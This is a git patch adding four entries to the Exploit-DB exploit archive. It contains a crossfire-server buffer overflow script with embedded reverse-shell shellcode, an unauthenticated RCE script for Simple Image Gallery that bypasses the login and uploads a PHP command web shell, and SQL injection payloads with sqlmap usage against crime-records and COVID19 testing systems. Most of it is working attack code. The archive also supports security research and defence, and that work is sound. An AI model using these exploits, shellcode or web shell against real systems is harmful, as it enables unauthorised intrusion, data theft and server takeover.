From 6f730aa2351189b428b489e9db1244801bba8121 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 19 Aug 2021 05:01:52 +0000 Subject: [PATCH] DB: 2021-08-19 4 changes to exploits/shellcodes crossfire-server 1.9.0 - 'SetUp()' Remote Buffer Overflow Crime records Management System 1.0 - 'Multiple' SQL Injection (Authenticated) Simple Image Gallery 1.0 - Remote Code Execution (RCE) (Unauthenticated) COVID19 Testing Management System 1.0 - 'Multiple' SQL Injections --- exploits/linux/remote/50216.py | 52 +++++++++ exploits/php/webapps/50213.txt | 73 ++++++++++++ exploits/php/webapps/50214.py | 73 ++++++++++++ exploits/php/webapps/50215.txt | 203 +++++++++++++++++++++++++++++++++ files_exploits.csv | 4 + 5 files changed, 405 insertions(+) create mode 100755 exploits/linux/remote/50216.py create mode 100644 exploits/php/webapps/50213.txt create mode 100755 exploits/php/webapps/50214.py create mode 100644 exploits/php/webapps/50215.txt diff --git a/exploits/linux/remote/50216.py b/exploits/linux/remote/50216.py new file mode 100755 index 000000000..d18fc735b --- /dev/null +++ b/exploits/linux/remote/50216.py @@ -0,0 +1,52 @@ +# Exploit Title: crossfire-server 1.9.0 - 'SetUp()' Remote Buffer Overflow +# Exploit Author: Khaled Salem @Khaled0x07 +# Software Link: https://www.exploit-db.com/apps/43240af83a4414d2dcc19fff3af31a63-crossfire-1.9.0.tar.gz +# Version: 1.9.0 +# Tested on: Kali Linux 2020.4 +# CVE : CVE-2006-1236 + +#!/bin/python +import socket +import time + + +# Crash at 4379 +# EIP Offset at 4368 +# Badchar \x00\x20 +# ECX Size 170 +# CALL ECX 0x080640eb + +size = 4379 + +# Attacker IP: 127.0.0.1 Port: 443 +shellcode = b"" +shellcode += b"\xd9\xee\xd9\x74\x24\xf4\xb8\x60\x61\x5f\x28" +shellcode += b"\x5b\x33\xc9\xb1\x12\x31\x43\x17\x03\x43\x17" +shellcode += b"\x83\xa3\x65\xbd\xdd\x12\xbd\xb6\xfd\x07\x02" +shellcode += b"\x6a\x68\xa5\x0d\x6d\xdc\xcf\xc0\xee\x8e\x56" +shellcode += b"\x6b\xd1\x7d\xe8\xc2\x57\x87\x80\xab\xa7\x77" +shellcode += b"\x51\x3c\xaa\x77\x50\x07\x23\x96\xe2\x11\x64" +shellcode += b"\x08\x51\x6d\x87\x23\xb4\x5c\x08\x61\x5e\x31" +shellcode += b"\x26\xf5\xf6\xa5\x17\xd6\x64\x5f\xe1\xcb\x3a" +shellcode += b"\xcc\x78\xea\x0a\xf9\xb7\x6d" + + + + +try: + filler = "\x90"*(4368 - 170) + shellcode+"\x90"*(170-len(shellcode)) + EIP = "\xeb\x40\x06\x08" + padding = "C" * (4379 - len(filler) - len(EIP)) + payload = filler + EIP + padding + inputBuffer = "\x11(setup sound "+ payload +"\x90\x00#" + print("Sending Buffer with size:" + str(len(payload))) + s = socket.socket(socket.AF_INET , socket.SOCK_STREAM) + s.connect(("192.168.1.4",13327)) # Server IP Address: 192.168.1.4 + print(s.recv(1024)) + + s.send(inputBuffer) + s.close() + +except: + print("Could not connect") + exit(0) \ No newline at end of file diff --git a/exploits/php/webapps/50213.txt b/exploits/php/webapps/50213.txt new file mode 100644 index 000000000..083df99fe --- /dev/null +++ b/exploits/php/webapps/50213.txt @@ -0,0 +1,73 @@ +# Exploit Title: Crime records Management System 1.0 - 'Multiple' SQL Injection (Authenticated) +# Date: 17/08/2021 +# Exploit Author: Davide 't0rt3ll1n0' Taraschi +# Vendor Homepage: https://www.sourcecodester.com/users/osman-yahaya +# Software Link: https://www.sourcecodester.com/php/14894/police-crime-record-management-system.html +# Version: 1.0 +# Testeted on: Linux (Ubuntu 20.04) using LAMPP + +## Impact: + An authenticated user may be able to read data for which is not authorized, tamper with or destroy data, or possibly even read/write files or execute code on the database server. + +## Description: + All four parameters passed via POST are vulnerable: + `fname` is vulnerable both to boolean-based blind and time-based blind SQLi + `oname` is vulnerable both to boolean-based blind and time-based blind SQLi + `username` is only vulnerable to time-based blind SQLi + `status` is vulnerable both to boolean-based blind and time-based blind SQLi + +## Remediation: +Here is the vulnerable code: + +if($status==''){ + mysqli_query($dbcon,"update userlogin set surname='$fname', othernames='$oname' where staffid='$staffid'")or die(mysqli_error()); +} +if(!empty($status)){ + mysqli_query($dbcon,"update userlogin set surname='$fname',status='$status', othernames='$oname' where staffid='$staffid'")or die(mysqli_error()); +} + +As you can see the parameters described above are passed to the code without being checked, this lead to the SQLi. +To patch this vulnerability, i suggest to sanitize those variables via `mysql_real_escape_string()` before being passed to the prepared statement. + +## Exploitation through sqlmap +1) Log into the application (you can try the default creds 1111:admin123) +2) Copy your PHPSESSID cookie +3) Launch the following command: +sqlmap --method POST -u http://$target/ghpolice/admin/savestaffedit.php --data="fname=&oname=&username=&status=" --batch --dbs --cookie="PHPSESSID=$phpsessid" +replacing $target with your actual target and $phpsessid with the cookie that you had copied before + +## PoC: +Request: +POST /ghpolice/admin/savestaffedit.php HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 77 +Origin: http://localhost +DNT: 1 +Connection: close +Referer: http://localhost/ghpolice/admin/user.php +Cookie: PHPSESSID=f7123ac759cd97868df0f363434c423f +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: same-origin +Sec-Fetch-User: ?1 + +fname=' AND (SELECT * FROM (SELECT(SLEEP(5)))foo)-- &oname=&username=&status= + +And after 5 seconds we got: + +HTTP/1.1 200 OK +Date: Tue, 17 Aug 2021 14:28:59 GMT +Server: Apache/2.4.48 (Unix) OpenSSL/1.1.1k PHP/7.4.22 mod_perl/2.0.11 Perl/v5.32.1 +X-Powered-By: PHP/7.4.22 +Content-Length: 1074 +Connection: close +Content-Type: text/html; charset=UTF-8 + + + etc... \ No newline at end of file diff --git a/exploits/php/webapps/50214.py b/exploits/php/webapps/50214.py new file mode 100755 index 000000000..b7e95408b --- /dev/null +++ b/exploits/php/webapps/50214.py @@ -0,0 +1,73 @@ +# Exploit Title: Simple Image Gallery 1.0 - Remote Code Execution (RCE) (Unauthenticated) +# Date: 17.08.2021 +# Exploit Author: Tagoletta (Tağmaç) +# Software Link: https://www.sourcecodester.com/php/14903/simple-image-gallery-web-app-using-php-free-source-code.html +# Version: V 1.0 +# Tested on: Ubuntu + +import requests +import random +import string +import json +from bs4 import BeautifulSoup + +url = input("TARGET = ") + +if not url.startswith('http://') and not url.startswith('https://'): + url = "http://" + url +if not url.endswith('/'): + url = url + "/" + +payload= "'; $cmd = ($_GET['cmd']); system($cmd); echo ''; die; } ?>" + +session = requests.session() + +print("Login Bypass") + +request_url = url + "/classes/Login.php?f=login" +post_data = {"username": "admin' or '1'='1'#", "password": ""} +bypassUser = session.post(request_url, data=post_data) +data = json.loads(bypassUser.text) +status = data["status"] + +if status == "success": + + let = string.ascii_lowercase + + shellname = ''.join(random.choice(let) for i in range(15)) + shellname = 'Tago'+shellname+'Letta' + + print("shell name "+shellname) + + print("\nprotecting user") + request_url = url + "?page=user" + getHTML = session.get(request_url) + getHTMLParser = BeautifulSoup(getHTML.text, 'html.parser') + + ids = getHTMLParser.find('input', {'name':'id'}).get("value") + firstname = getHTMLParser.find('input', {'id':'firstname'}).get("value") + lastname = getHTMLParser.find('input', {'id':'lastname'}).get("value") + username = getHTMLParser.find('input', {'id':'username'}).get("value") + + print("\nUser ID : " + ids) + print("Firsname : " + firstname) + print("Lasname : " + lastname) + print("Username : " + username + "\n") + + print("shell uploading") + + request_url = url + "/classes/Users.php?f=save" + request_headers = {"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundary9nI3gVmJoEZoZyeA"} + request_data = "------WebKitFormBoundary9nI3gVmJoEZoZyeA\r\nContent-Disposition: form-data; name=\"id\"\r\n\r\n"+ids+"\r\n------WebKitFormBoundary9nI3gVmJoEZoZyeA\r\nContent-Disposition: form-data; name=\"firstname\"\r\n\r\n"+firstname+"\r\n------WebKitFormBoundary9nI3gVmJoEZoZyeA\r\nContent-Disposition: form-data; name=\"lastname\"\r\n\r\n"+lastname+"\r\n------WebKitFormBoundary9nI3gVmJoEZoZyeA\r\nContent-Disposition: form-data; name=\"username\"\r\n\r\n"+username+"\r\n------WebKitFormBoundary9nI3gVmJoEZoZyeA\r\nContent-Disposition: form-data; name=\"password\"\r\n\r\n\r\n------WebKitFormBoundary9nI3gVmJoEZoZyeA\r\nContent-Disposition: form-data; name=\"img\"; filename=\""+shellname+".php\"\r\nContent-Type: application/octet-stream\r\n\r\n"+payload+"\r\n------WebKitFormBoundary9nI3gVmJoEZoZyeA--\r\n" + upload = session.post(request_url, headers=request_headers, data=request_data) + + if upload.text == "1": + print("- OK -") + req = session.get(url + "/?page=user") + parser = BeautifulSoup(req.text, 'html.parser') + find_shell = parser.find('img', {'id':'cimg'}) + print("Shell URL : " + find_shell.get("src") + "?cmd=whoami") + else: + print("- NO :( -") +else: + print("No bypass user") \ No newline at end of file diff --git a/exploits/php/webapps/50215.txt b/exploits/php/webapps/50215.txt new file mode 100644 index 000000000..b5b586d7a --- /dev/null +++ b/exploits/php/webapps/50215.txt @@ -0,0 +1,203 @@ +# Exploit Title: COVID19 Testing Management System 1.0 - 'Multiple' SQL Injections +# Date: 17-08-2021 +# Exploit Author: Halit AKAYDIN (hLtAkydn) +# Vendor Homepage: https://phpgurukul.com +# Software Link: https://phpgurukul.com/covid19-testing-management-system-using-php-and-mysql/ +# Version: V1 +# Category: Webapps +# Tested on: Linux/Windows + +# Description: +# PHP Dashboards is prone to an SQL-injection vulnerability +# because it fails to sufficiently sanitize user-supplied data before using +# it in an SQL query.Exploiting this issue could allow an attacker to +# compromise the application, access or modify data, or exploit latent +# vulnerabilities in the underlying database. + +# Vulnerable Request: + +POST /check_availability.php HTTP/1.1 +Host: localhost +Content-Length: 12 +sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="88" +Accept: */* +X-Requested-With: XMLHttpRequest +sec-ch-ua-mobile: ?0 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Origin: http://localhost +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: cors +Sec-Fetch-Dest: empty +Referer: http://localhost/add-phlebotomist.php +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: PHPSESSID=cli5c49mh5ejaudonersihmhr9 +Connection: close + +employeeid=1 + +# Vulnerable Payload: + +# Parameter: employeeid (POST) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: + +employeeid=1' AND 2323=2323 AND 'gARj'='gARj + +# Type: time-based blind +# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) +# Payload: + +employeeid=1' AND (SELECT 5982 FROM (SELECT(SLEEP(10)))aPnu) AND 'bDQl'='bDQl + +------------------------------------------------------------------------------ + +# Vulnerable Request: + +POST /add-phlebotomist.php HTTP/1.1 +Host: localhost +Content-Length: 61 +Cache-Control: max-age=0 +sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="88" +sec-ch-ua-mobile: ?0 +Upgrade-Insecure-Requests: 1 +Origin: http://localhost +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Sec-Fetch-Dest: document +Referer: http://localhost/add-phlebotomist.php +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: PHPSESSID=cli5c49mh5ejaudonersihmhr9 +Connection: close + +empid=1&fullname=dsadas&mobilenumber=1111111111&submit=Submit + +# Vulnerable Payload: + +# Parameter: empid (POST) +# Type: time-based blind +# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) +# Payload: + +empid=1' AND (SELECT 4626 FROM (SELECT(SLEEP(10)))jVok) AND 'bqxW'='bqxW&fullname=dsadas&mobilenumber=1111111111&submit=Submit + +------------------------------------------------------------------------------ + +# Vulnerable Request: + +POST /edit-phlebotomist.php?pid=6 HTTP/1.1 +Host: localhost +Content-Length: 61 +Cache-Control: max-age=0 +sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="88" +sec-ch-ua-mobile: ?0 +Upgrade-Insecure-Requests: 1 +Origin: http://localhost +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Sec-Fetch-Dest: document +Referer: http://localhost/edit-phlebotomist.php?pid=6 +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: PHPSESSID=cli5c49mh5ejaudonersihmhr9 +Connection: close + +empid=1&fullname=dsadas&mobilenumber=1111111111&update=Update + +# Vulnerable Payload: + +# Parameter: fullname (POST) +# Type: time-based blind +# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) +# Payload: + +empid=1&fullname=dsadas' AND (SELECT 6868 FROM (SELECT(SLEEP(10)))yvbu) AND 'xVJk'='xVJk&mobilenumber=1111111111&update=Update + +------------------------------------------------------------------------------ + +# Vulnerable Request: + +POST /bwdates-report-result.php HTTP/1.1 +Host: localhost +Content-Length: 51 +Cache-Control: max-age=0 +sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="88" +sec-ch-ua-mobile: ?0 +Upgrade-Insecure-Requests: 1 +Origin: http://localhost +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Sec-Fetch-Dest: document +Referer: http://localhost/bwdates-report-ds.php +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: PHPSESSID=cli5c49mh5ejaudonersihmhr9 +Connection: close + +fromdate=2021-08-17&todate=2021-08-17&submit=Submit + +# Vulnerable Payload: + +# Parameter: fromdate (POST) +# Type: time-based blind +# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) +# Payload: + +fromdate=2021-08-17' AND (SELECT 6977 FROM (SELECT(SLEEP(10)))pNed) AND 'qbnJ'='qbnJ&todate=2021-08-17&submit=Submit + +------------------------------------------------------------------------------ + +# Vulnerable Request: + +POST /search-report-result.php HTTP/1.1 +Host: localhost +Content-Length: 27 +Cache-Control: max-age=0 +sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="88" +sec-ch-ua-mobile: ?0 +Upgrade-Insecure-Requests: 1 +Origin: http://localhost +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Sec-Fetch-Dest: document +Referer: http://localhost/search-report.php +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: PHPSESSID=cli5c49mh5ejaudonersihmhr9 +Connection: close + +serachdata=32&search=Search + +# Vulnerable Payload: + +# Parameter: serachdata (POST) +# Type: time-based blind +# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) +# Payload: + +serachdata=1231') AND (SELECT 1275 FROM (SELECT(SLEEP(10)))queW) AND ('HkZa'='HkZa&search=Search + +# Type: UNION query +# Title: Generic UNION query (NULL) - 7 columns +# Payload: + +serachdata=1231') UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71706b7671,0x4a6d476c4861544c4c66446b6961755076707354414d6f5150436c766f6b4a624955625159747a4d,0x7170717071),NULL,NULL-- -&search=Search \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 95bb08dd5..9af7832d1 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -18522,6 +18522,7 @@ id,file,description,date,author,type,platform,port 50145,exploits/hardware/remote/50145.txt,"KevinLAB BEMS 1.0 - Undocumented Backdoor Account",2021-07-21,LiquidWorm,remote,hardware, 50160,exploits/hardware/remote/50160.txt,"Denver Smart Wifi Camera SHC-150 - 'Telnet' Remote Code Execution (RCE)",2021-07-28,"Ivan Nikolsky",remote,hardware, 50170,exploits/java/remote/50170.java,"Neo4j 3.4.18 - RMI based Remote Code Execution (RCE)",2021-08-02,"Christopher Ellis",remote,java, +50216,exploits/linux/remote/50216.py,"crossfire-server 1.9.0 - 'SetUp()' Remote Buffer Overflow",2021-08-18,"Khaled Salem",remote,linux, 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -44339,3 +44340,6 @@ id,file,description,date,author,type,platform,port 50209,exploits/hardware/webapps/50209.txt,"COMMAX Smart Home Ruvie CCTV Bridge DVR Service - Config Write / DoS (Unauthenticated)",2021-08-16,LiquidWorm,webapps,hardware, 50210,exploits/hardware/webapps/50210.txt,"COMMAX CVD-Axx DVR 5.1.4 - Weak Default Credentials Stream Disclosure",2021-08-16,LiquidWorm,webapps,hardware, 50211,exploits/hardware/webapps/50211.txt,"GeoVision Geowebserver 5.3.3 - LFI / XSS / HHI / RCE",2021-08-17,"Ken Pyle",webapps,hardware, +50213,exploits/php/webapps/50213.txt,"Crime records Management System 1.0 - 'Multiple' SQL Injection (Authenticated)",2021-08-18,"Davide Taraschi",webapps,php, +50214,exploits/php/webapps/50214.py,"Simple Image Gallery 1.0 - Remote Code Execution (RCE) (Unauthenticated)",2021-08-18,Tagoletta,webapps,php, +50215,exploits/php/webapps/50215.txt,"COVID19 Testing Management System 1.0 - 'Multiple' SQL Injections",2021-08-18,"Halit AKAYDIN",webapps,php,